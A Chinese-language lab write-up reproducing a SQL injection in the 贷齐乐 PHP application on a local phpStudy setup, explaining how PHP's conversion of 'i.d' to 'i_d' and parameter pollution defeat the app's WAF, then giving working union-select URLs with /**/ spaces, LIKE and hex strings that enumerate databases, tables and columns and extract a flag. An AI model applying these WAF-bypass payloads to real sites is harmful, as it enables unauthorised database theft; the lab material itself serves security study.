贷齐乐漏洞复现+php特性绕过WAF

目录

一、环境搭建

1.将贷齐乐源码放入phpstudy中的www目录下

2.在phpstudy上创建网站:

3.在本地数据库中创建数据库--ctf,并创建users表:

4.往表中插入数据:

5.查看users表:

6.测试能否访问到数据库

二、源码分析

1.WAF1:

2.WAF2:

3.php特性:

4.绕过方法:

三、联合注入

1.找注入点:空格被过滤所以用/**/来代替空格

2.爆库名:

3.通过limit来一个一个显示数据库名:

4.爆表名:

5.查字段名

6.得到flag


一、环境搭建

1.将贷齐乐源码放入phpstudy中的www目录下

2.在phpstudy上创建网站:

注意db.inc.php中数据库信息要与本地数据库一致

复制代码
<?php

$mysql_server_name="localhost";

$mysql_database="ctf";    /** 数据库的名称 */

$mysql_username="root";  /** MySQL数据库用户名 */

$mysql_password="123456";  /** MySQL数据库密码 */

$conn = mysqli_connect($mysql_server_name, $mysql_username,$mysql_password,$mysql_database);

?>

3.在本地数据库中创建数据库--ctf,并创建users表:

复制代码
CREATE DATABASE ctf

use ctf
CREATE TABLE `users` (
  `Id` int(11) NOT NULL AUTO_INCREMENT,
  `name` varchar(255) DEFAULT NULL,
  `pass` varchar(255) DEFAULT NULL,
  `flag` varchar(255) DEFAULT NULL,
  PRIMARY KEY (`Id`)
) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=utf8

4.往表中插入数据:

复制代码
mysql> INSERT INTO `users` (`name`, `pass`, `flag`) VALUES ('admin', 'admin', 'hrctf{R3qeeeee_Is_1nterEst1ng}');

5.查看users表:

6.测试能否访问到数据库

二、源码分析

1.WAF1:

包含点,单引号,星号等等,一旦包含直接删除非法字符,然后又注释掉了一系列东西

复制代码
 function dhtmlspecialchars($string) {
      if (is_array($string)) {
          foreach ($string as $key => $val) {
              $string[$key] = dhtmlspecialchars($val);
          }
      }
      else {
          $string = str_replace(array('&', '"', '<', '>', '(', ')'), array('&amp;', '&quot;', '&lt;', '&gt;', '(', ')'), $string);
          if (strpos($string, '&amp;#') !== false) {
              $string = preg_replace('/&amp;((#(\d{3,5}|x[a-fA-F0-9]{4}));)/', '&\\1', $string);
          }
      }
      return $string;

2.WAF2:

GET/POST/REQUEST/COOKIE都会经过这个替换str_replace(array('&', '"', '<', '>','(',')'), array('&', '"', '<', '>','(',')'), $string),

这个替换最明显的效果,就是所有的英文括号都变成中文括号,导致user(),database()等无法执

复制代码
function dowith_sql($str) {
      $check = preg_match('/select|insert|update|delete|\'|\/\*|\*|\.\.\/|\.\/|union|into|load_file|outfile/is', $str);
      if ($check) {
          echo "非法字符!";
          exit();
      }
      return $str;
  }

在我们的第一道WAF之后进行的,假设我们有一个方法让第一道WAF认为请求中没有恶意字符,再通过这里的覆盖,将恶意字符引入$_REQUEST中,就可以造成WAF的绕过了。

3.php特性:

1**.当我们输入两个相同名字的参数的时候,php是取后一个的。----php全局污染**

2.php另一个特性,自身在解析请求的时候,如果参数名字中包含" "、"."、"["这几个字符,会将他们转换成下划线。

4.绕过方法:

假设我发送的是这样一个请求:i_d=1&i.d=2 ,php先将i.d转换成i_d,即为i_d=1&i_d=2 ,再获取到的$_REQUEST'i_d'就是2。

可在_SERVER\['REQUEST_URI'\]中,i_d和i.d却是两个完全不同的参数名,那么切割覆盖后,获取的_REQUEST'i_d'却是1。

1、hpp php 只接收同名参数的最后一个,这个也涉及hpp全局参数污染。

2、php中会将get传参中的key中的.转为_

3、$_REQUEST 遵循php接收方式,i_d&i.d中的最后一个参数的转换为下划线然后接收,所以我们的正常代码放在第二个参数,waf失效。

三、联合注入

通过对源码的解读,可见过滤了很多东西,比如空格、括号、单引号等等,那么在接下来的注入中,我们需要合理的去绕过这些waf。由于括号被注释掉了,所以可以使用联合注入。

1.找注入点:空格被过滤所以用/**/来代替空格

复制代码
http://127.0.0.1:8081/index.php/?i_d=-1/**/union/**/select/**/1,2,3&i.d=1&submit=1

在第二个字段进行的回显,所以我们就在第二个字段进行注入

2.爆库名:

复制代码
http://127.0.0.1:8081/index.php/?i_d=-1/**/union/**/select/**/1,table_schema,3,4/**/from/**/information_schema.tables&i.d=1&submit=1

3.通过limit来一个一个显示数据库名:

复制代码
http://127.0.0.1:8081/index.php/?i_d=-1/**/union/**/select/**/1,table_schema,3,4/**/from/**/information_schema.tables/**/limit/**/3,1&i.d=1&submit=1

4.爆表名:

复制代码
http://127.0.0.1:8081/index.php/?i_d=-1/**/union/**/select/**/1,table_name,3,4/**/from/**/information_schema.tables/**/where/**/table_schema/**/like/**/0x637466/**/limit/**/0,1&i.d=1&submit=1

由于等号被截断了,所以使用like进行替换,同时传入数据库中的内容使用十六进制进行了替换

5.查字段名

复制代码
http://127.0.0.1:8081/index.php/?&i_d=-1/**/union/**/select/**/1,column_name,3,4/**/from/**/information_schema.columns/**/where/**/table_schema/**/like/**/0x637466/**/and/**/table_name/**/like/**/0x7573657273/**/limit/**/3,1&i.d=1&submit=1

6.得到flag

复制代码
http://127.0.0.1:8081/index.php/?&i_d=-1/**/union/**/select/**/1,flag,3,4/**/from/**/ctf.users&i.d=1&submit=1
相关推荐
木木子221 天前
[特殊字符] 音乐播放器——状态驱动的多媒体控制
android·开发语言·华为·php·harmonyos
酷酷的身影1 天前
Drivers/LedManager.cs
开发语言·php
可靠的仙人掌1 天前
SAC(Soft Actor-Critic)算法底座
开发语言·算法·php
qq_422152571 天前
PDF内容复用的几种实用方法:转PPT、转图片、转长图
pdf·php·powerpoint
xy34532 天前
Wireshark捕获过滤器——语法元素详解
网络·测试工具·渗透测试·wireshark
weixin_BYSJ19872 天前
SpringBoot + MySQL 乒乓球运动员信息管理系统项目实战--附源码04954
java·javascript·spring boot·python·django·flask·php
用户3074596982072 天前
GatewayWorker 从零到一完整指南
javascript·php
XR1234567882 天前
食品饮料与制药行业GMP合规网络建设:无尘车间的网络不能成为污染源
开发语言·网络·php
AC赳赳老秦2 天前
传感器数据自动汇总:OpenClaw 采集多类传感器数据、清洗入库、生成趋势分析
java·人工智能·python·自动化·github·php·openclaw
Dynadot_tech2 天前
如何拍卖域名
开发语言·php